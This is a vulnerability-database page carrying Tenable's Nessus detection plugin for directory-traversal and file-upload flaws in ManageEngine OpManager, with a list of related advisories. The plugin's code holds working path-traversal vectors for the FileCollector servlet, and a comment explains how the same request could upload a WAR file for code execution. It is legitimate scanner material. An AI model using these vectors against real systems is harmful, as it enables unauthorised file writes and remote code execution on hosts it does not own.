Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL
HistoryFeb 16, 2015 - 12:00 a.m.

ManageEngine OpManager Multiple Directory Traversal Vulnerabilities

2015-02-1600:00:00
This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
17
JSON

The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :

  • The FileCollector servlet fails to properly sanitize user-supplied input to the ‘regionID’ and ‘FILENAME’ parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.
    (CVE-2014-6034, CVE-2014-6035)

  • The multipartRequest servlet fails to properly sanitize user-supplied input to the ‘fileName’ parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)

Note that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(81378);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036");
  script_bugtraq_id(70167, 70169, 70172);

  script_name(english:"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities");
  script_summary(english:"Attempts to upload a file.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java web application that is affected
by multiple directory traversal vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of ManageEngine OpManager installed on the remote host is
affected by multiple directory traversal vulnerabilities :

  - The FileCollector servlet fails to properly sanitize
    user-supplied input to the 'regionID' and 'FILENAME'
    parameters when uploading files. This allows a remote
    attacker and authenticated users to write to and
    execute arbitrary WAR files.
    (CVE-2014-6034, CVE-2014-6035)

  - The multipartRequest servlet fails to properly sanitize
    user-supplied input to the 'fileName' parameter. This
    allows a remote attacker and authenticated users to
    delete arbitrary files. (CVE-2014-6036)

Note that Nessus has tested for the two directory traversal and file
upload vulnerabilities; however, it did not test for the arbitrary
code execution or file deletion vulnerabilities. If a file can be
uploaded via the directory traversal attack, then the execution and
deletion flaws are likely exploitable as well.");
  # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d44b4150");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2014/Sep/110");
  script_set_attribute(attribute:"solution", value:
"Upgrade to ManageEngine OpManager version 11.3 and apply the
vendor-supplied patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-6035");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"ManageEngine OpManager FileCollector Servlet File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/09/27");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/09/27");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/02/16");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:zohocorp:manageengine_opmanager");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("manageengine_opmanager_detect.nbin");
  script_require_keys("installed_sw/ManageEngine OpManager");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "ManageEngine OpManager";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80);

install = get_single_install(
  app_name            : app,
  port                : port,
  exit_if_unknown_ver : TRUE
);

dir = install["path"];
install_url =  build_url(port:port, qs:dir);
unique = rand_str(length:10);
file = "nessus_delete_this_file_" + unique + ".css";

# Try to upload a CSS file
# While we don't try to upload a WAR file directly, if we can
# upload a CSS file we could use the same request to upload a WAR
# file which would allow for remote code execution
postdata = 'Nessus Check: '+unique;

# Couple of vectors to test
vectors = make_list(
  "servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/"+file,
  "servlets/FileCollector?AGENTKEY=123&FILENAME=..\\..\\..\\webclient\\common\\css\\"+file,
  "servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME="+file,
  "servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\..\\..\\webclient\\common\\css&FILENAME="+file
);

uploaded = FALSE;
executed = FALSE;
vecurl   = "";
foreach vector (vectors)
{

  res = http_send_recv3(
    port            : port,
    method          : "POST",
    item            : dir+vector,
    data            : postdata,
    content_type    : "text/html",
    exit_on_fail    : TRUE
  );
  exp_request = http_last_sent_request();

  # Try and access our uploaded file
  res = http_send_recv3(
    method : "GET",
    port   : port,
    item   : dir + "webclient/common/css/" +file,
    exit_on_fail : TRUE
  );

  # Only need to upload one file
  if("Nessus Check: "+unique >< res[2])
  {
    uploaded = TRUE;
    vecurl = vector;
    break;
  }
}

if (uploaded)
{
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    file        : dir+"webclient/common/css/"+file,
    line_limit  : 10,
    request     : make_list(exp_request),
    output      : chomp(res[2]),
    attach_type : 'text/plain'
  );
} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
VendorProductVersionCPE
zohocorpmanageengine_opmanagercpe:/a:zohocorp:manageengine_opmanager

Related

packetstorm 2
securityvulns 2
zdt 2
exploitpack 1
exploitdb 1
prion 3
checkpoint_advisories 3
dsquare 2
zdi 3
cve 3
openvas 1
packetstorm
packetstorm
ManageEngine Code Execution / File Deletion
2014-09-29 00:00:00
ManageEngine OpManager / Social IT Arbitrary File Upload
2014-09-29 00:00:00
securityvulns
securityvulns
[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360
2014-10-14 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-10-14 00:00:00
zdt
zdt
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
2018-01-26 00:00:00
ManageEngine OpManager / Social IT Arbitrary File Upload Exploit
2014-10-01 00:00:00
exploitpack
exploitpack
ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities
2014-11-09 00:00:00
exploitdb
exploitdb
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
2014-11-09 00:00:00
prion
prion
Directory traversal
2014-12-04 17:59:00
Directory traversal
2014-12-04 17:59:00
Directory traversal
2014-12-04 17:59:00
checkpoint_advisories
checkpoint_advisories
ManageEngine Multiple Products FileCollector doPost Directory Traversal (CVE-2014-6034)
2014-10-12 00:00:00
ManageEngine Multiple Products multipartRequest Directory Traversal (CVE-2014-6036)
2014-10-20 00:00:00
ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)
2014-10-13 00:00:00
dsquare
dsquare
ManageEngine OpManager FileCollector Servlet File Upload
2014-11-30 00:00:00
ManageEngine OpManager FileCollector Servlet File Upload
2014-11-30 00:00:00
zdi
zdi
ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability
2015-04-15 00:00:00
ManageEngine OpManager MultipartRequestServlet filename File Upload Remote Code Execution Vulnerability
2015-04-03 00:00:00
ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability
2015-04-15 00:00:00
cve
cve
CVE-2014-6034
2014-12-04 17:59:00
CVE-2014-6036
2014-12-04 17:59:00
CVE-2014-6035
2014-12-04 17:59:00
openvas
openvas
ManageEngine OpManager Multiple Vulnerabilities (Nov 2014) - Active Check
2014-11-24 00:00:00
JSON
Related for MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL
packetstorm2securityvulns2zdt2exploitpack1exploitdb1prion3checkpoint_advisories3dsquare2zdi3cve3openvas1